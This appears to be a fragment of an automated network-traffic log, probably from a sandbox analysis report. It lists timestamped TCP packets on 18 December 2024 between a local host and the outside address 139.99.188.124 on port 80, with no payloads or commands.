                                                          Dec 18, 2024 09:32:40.082078934 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.082125902 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.082186937 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.083378077 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.083431959 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.083453894 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.084644079 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.084692001 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.084800959 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.086000919 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.086035967 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.086050987 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.087222099 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.087270021 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.087333918 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.088519096 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.088568926 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.088613033 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.089796066 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.089848042 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.089914083 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.091089964 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.091135979 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.091232061 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.092389107 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.092434883 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.092494011 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.093689919 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.093739986 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.093801975 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.094954014 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.095063925 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.095072031 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.096229076 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.096276045 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.096340895 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.097502947 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.097548962 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.097608089 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.098809004 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.098855972 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.098932028 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.100111961 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.100156069 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.100306034 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.101421118 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.101457119 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.101468086 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.102715015 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.102762938 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.102835894 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.104065895 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.104114056 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.104263067 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.105370998 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.105385065 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.105416059 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.106590986 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.106646061 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.106689930 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.108217955 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.108268976 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.108349085 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.109570980 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.109626055 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.109651089 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.110440969 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.110488892 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.110574007 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.111735106 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.111787081 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.111835957 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.112989902 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.113039017 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.113116980 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.114365101 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.114418030 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.114418983 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.115561962 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.115612030 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.115675926 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.116856098 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.116905928 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.117079973 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.118164062 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.118215084 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.118268013 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.119446993 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.119499922 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.119574070 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.120716095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.120822906 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.120826006 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.122078896 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.122127056 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.122201920 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.123441935 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.123480082 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.123497963 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.124656916 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.124705076 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.124778032 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.125956059 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.125998020 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.126008987 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.127191067 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.127240896 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.127307892 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.128472090 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.128523111 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.128585100 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.129750967 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.129796982 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.129859924 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.131032944 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.131136894 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.131375074 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.132375956 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.132414103 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.132424116 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.133651018 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.133699894 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.133784056 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.134932995 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.134968042 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.134979963 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.136197090 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.136240959 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.136316061 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.137497902 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.137550116 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.137610912 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.138797045 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.138844967 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.138927937 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.187932014 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.262327909 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.262485981 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.262658119 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.262909889 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.263031960 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.263087034 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.264209986 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.264245987 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.264293909 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.265374899 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.265491009 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.265542984 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.266638994 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.266769886 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.266820908 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.267849922 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.267983913 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.268037081 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.269109964 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.269170046 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.269220114 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.270339966 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.270513058 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.270560026 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.271809101 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.271928072 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.271979094 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.272798061 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.272924900 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.272978067 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.274096966 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.274240971 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.274302959 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.275356054 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.275439024 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.275496006 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.276520014 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.276601076 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.276655912 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.277733088 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.277868986 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.277920961 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.278980017 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.279105902 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.279156923 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.280292034 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.280399084 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.280443907 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.281436920 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.281603098 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.281658888 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.282785892 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.283056021 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.283106089 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.283973932 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.284082890 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.284132004 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.285175085 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.285331011 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.285378933 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.286465883 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.286556005 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.286598921 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.287723064 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.287837982 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.287887096 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.288971901 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.289110899 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.289161921 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.290178061 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.290215969 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.290261984 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.291377068 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.291512012 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.291594982 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.292619944 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.292776108 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.292823076 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.293876886 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.294030905 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.294076920 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.295056105 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.295172930 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.295221090 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.296344995 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.296456099 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.296504021 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.297544956 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.297694921 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.297749996 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.298779011 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.298907042 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.298954964 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.300106049 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.300357103 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.300400972 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.301269054 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.301372051 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.301419973 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.302525043 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.302658081 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.302705050 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.303756952 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.303812027 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.303859949 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.304964066 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.305152893 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.305201054 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.306181908 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.306304932 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.306359053 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.307447910 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.307611942 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.307660103 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.308664083 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.308957100 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.309001923 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.309912920 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.310005903 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.310049057 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.311130047 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.311247110 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.311290026 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.312350988 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.312515020 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.312556028 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.313621998 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.313683987 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.313734055 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.314836979 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.314946890 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.314992905 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.316107035 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.316196918 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.316241980 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.317331076 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.317416906 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.317464113 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.318567991 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.318730116 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.318773985 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.319804907 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.319892883 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.319935083 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.321027994 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.321168900 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.321208954 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.322248936 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.322348118 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.322391987 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.323570013 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.323647022 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.323689938 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.324812889 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.324903965 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.324959993 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.325969934 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.326076984 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.326246977 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.327218056 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.327344894 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.327389002 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.328450918 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.328555107 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.328589916 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.329646111 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.375390053 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.456306934 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.456320047 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.456331968 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.456342936 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.456355095 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.456367016 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.456389904 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.456424952 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.457573891 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.457866907 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.457906961 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.458755970 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.458928108 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.458969116 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.460001945 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.460259914 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.460299969 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.461218119 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.461424112 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.461458921 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.461580038 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.461591959 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.461631060 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.462510109 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.462613106 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.462650061 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.463736057 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.463828087 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.463907957 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.465162992 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.465183973 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.465224028 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.466249943 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.466317892 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.466358900 CET4973180192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:40.467385054 CET8049731139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:40.467551947 CET8049731139.99.188.124192.168.2.4
